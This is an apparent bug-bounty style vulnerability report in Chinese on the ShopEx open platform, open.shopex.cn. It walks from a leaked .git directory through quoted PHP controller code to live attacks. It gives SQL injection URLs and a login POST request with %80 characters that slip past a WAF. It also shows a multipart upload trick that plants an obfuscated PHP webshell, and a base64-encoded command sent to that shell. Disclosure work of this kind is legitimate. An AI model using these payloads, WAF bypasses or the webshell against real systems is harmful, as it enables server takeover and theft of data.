### 简要描述:
SQL注入.
### 详细说明:
BBScan 扫到一个git信息泄露:
```
http://open.shopex.cn/.git/
```
使用rip-git.pl把源码下载下来.
源码审计发现一个sql注入:
open.shopex.cn\core\application\controllers\docs.php:
```
/**
* API接口搜索列表页
*
* @access public
*
* @return void
*/
public function api_search($category_id){
$this->data['navigations'][] = array('name'=>'开发文档','url'=>'');
$this->data['navigations'][] = array('name'=>'API文档','url'=>site_url('/docs/api_list/'.$category_id));
$platform_id = isset($_GET['platform_id'])?$_GET['platform_id']:0;
$docs_keyword = isset($_GET['docs_keyword'])?trim(urldecode($_GET['docs_keyword'])):'';
$method_type_id = isset($_GET['method_type_id'])?$_GET['method_type_id']:0;
/**
*
* 开发文档页改变布局
*/
$this->layout->Layout('doc_details');
/**
*
* 加载API列表模型,并获取API列表数据
*/
$this->load->model('method_type_model');
$api_list_data_temp = $this->method_type_model->get_api_list_all();
foreach($api_list_data_temp as $k=>$v){
$api_list_data[$v['id']] = $v;
}
$this->data['api_list_data'] = $api_list_data;
/**
*
* 支持平台列表
*/
$this->load->model('platform_model');
$platform_list = $this->platform_model->get_platform_list();
$this->data['platform_list'] = $platform_list;
/**
*
* 条件过滤
*/
$conditions = '1=1';
if($platform_id>0){
$conditions.= ' AND pm.platform_id='.$platform_id;
}
if($docs_keyword!=''){
$conditions.= ' AND (m.name like "%'.$docs_keyword.'%" OR m.introduction like "%'.$docs_keyword.'%")';
}
/**
*
* 左边筛选使用
*/
$this->load->model('method_model');
$filter_method_list = $this->method_model->get_method_search_list($conditions);//接口列表
$method_type_id_array = array();
foreach($filter_method_list as $k=>$v){
$method_type_id_array[] = $v['method_type_id'];
}
if($method_type_id>0){
$conditions.= ' AND mthm.method_type_id='.$method_type_id;
}
/**
*
* 加载API接口模型
*/
$this->load->model('method_model');
$method_list_temp = $this->method_model->get_method_search_list($conditions);//接口列表
foreach($method_list_temp as $k=>$v){
$temp = isset($api_list_data[$v['method_type_id']])?$api_list_data[$v['method_type_id']]['name']:'temp';
$method_list_group[$temp][] = $v;
}
$this->data['method_list_group'] = $method_list_group;
$this->data['method_type_id_array'] = $method_type_id_array;
$this->data['docs_keyword'] = $docs_keyword;
$this->data['platform_id'] = $platform_id;
$this->data['category_id'] = $category_id;
$this->data['method_type_id'] = $method_type_id;//当前列表ID
$this->layout->view('docs/api_search',$this->data);
}
```
三个参数存在sql注入:
```
platform_id docs_keyword method_type_id
```
搜一下发现已经提交过了:
[WooYun: Shopex开放平台某处SQL注入](http://www.wooyun.org/bugs/wooyun-2014-088313)
[WooYun: Shopex官方某平台存在SQL注入漏洞一枚](http://www.wooyun.org/bugs/wooyun-2015-0114559)
[WooYun: ShopEx某分站存在注入](http://www.wooyun.org/bugs/wooyun-2015-0115779)
漏洞任没有修复,但上了waf.
程序是CI框架,默认过滤掉了参数中的utf-8字符,所以在关键字中插入一个%80就能绕过waf了。
```
http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23
```
[<img src="https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png)
[<img src="https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png)
继续翻代码,找到一处任意文件上传:
open.shopex.cn\core\application\controllers\uploads.php:
```
class Uploads extends CI_Controller {
/**
* 首页图片上传
*
* @access public
*/
public function home_img(){
if(empty($_FILES['image'])){
$this->_return_msg('fail','上传内容格式不对!');
}
if(substr($_FILES['image']['type'],0,5)!='image'){
$this->_return_msg('fail','请确认上传的是图片!');
}
$image_name = $_FILES['image']['name'];
$image_name_exp = explode('.',$image_name);
$image_name = date('YmdHis').mt_rand(0,1).'.'.$image_name_exp[1];
$uploadfile = FCPATH.'uploads/home_img/'.$image_name;
move_uploaded_file($_FILES['image']['tmp_name'],$uploadfile);
$data['img'] = base_url('/uploads/home_img/'.$image_name);
$this->_return_msg('succ','成功',$data);
}...
```
利用php multipart/form-data 解析漏洞来绕过waf上传php shell:
```
POST /index.php/uploads/home_img HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 341
Content-Type: multipart/form-data; boundary=----,xxoo
------,xxoo
Content-Disposition: form-data; name="image"; filename="1.jpg"
Content-Type: image/png
------
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: image/png
<script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script>
------
------,xxoo--
```
shell:
```
http://open.shopex.cn/uploads/home_img/201512122130440.php
```
```
POST /uploads/home_img/201512122130440.php HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
c=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs=
```
[<img src="https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png)
另外还有一个sql注入:
```
POST /index.php/passport/passport/login HTTP/1.1
Host: 122.144.135.142
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718
Content-Length: 131
biz_id=&entid=')or updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png)
[<img src="https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png)
[<img src="https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png)
京公网安备 11010502034610号
暂无评论